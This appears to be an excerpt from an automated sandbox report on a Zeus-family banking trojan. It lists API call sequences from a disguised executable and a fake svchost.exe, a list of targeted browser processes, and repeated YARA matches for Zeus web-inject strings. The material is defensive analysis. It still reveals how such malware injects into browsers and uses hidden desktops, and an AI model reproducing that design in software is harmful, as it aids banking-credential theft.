,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_02566CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe6_2_02566CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe6_2_02561900
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_02553610
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_02553610
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex6_2_02553610
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex8_2_025D78A0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex8_2_025D78A0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex8_2_025D78A0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe8_2_025D6CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe8_2_025D6CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe8_2_025D6CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe8_2_025D6CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe8_2_025D6CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe8_2_025D6CA0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe8_2_025D1900
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex8_2_025C3610
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex8_2_025C3610
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex8_2_025C3610
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02C995B0 CreateDesktopA,SetThreadDesktop,memset,SHGetFolderPathA,PathAppendA,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,RegisterWindowMessageA,CreateThread,GetHandleInformation,CloseHandle,SetThreadDesktop,memset,SHGetFolderPathA,PathAppendA,CreateProcessA,GetShellWindow,GetShellWindow,Sleep,Sleep,GetShellWindow,GetHandleInformation,GetHandleInformation,CloseHandle,GetHandleInformation,CloseHandle,GetDesktopWindow,FindWindowA,CreateThread,GetHandleInformation,CloseHandle,SetEvent,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,1_2_02C995B0

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: 1.3.svchost.exe.39c0000.10.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 0.2.5AFlyarMds.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.2.svchost.exe.2c90000.6.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.32.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.15.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 23.2.cUKxeliGgCix.exe.3200000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.23.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.13.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 33.2.cUKxeliGgCix.exe.32f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.21.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.25.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 37.2.cUKxeliGgCix.exe.3140000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.29.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.3.svchost.exe.39c0000.20.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 23.2.cUKxeliGgCix.exe.2e42000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 1.2.svchost.exe.407000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
    Source: 21.2.cUKxeliGgCix.exe.22d2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
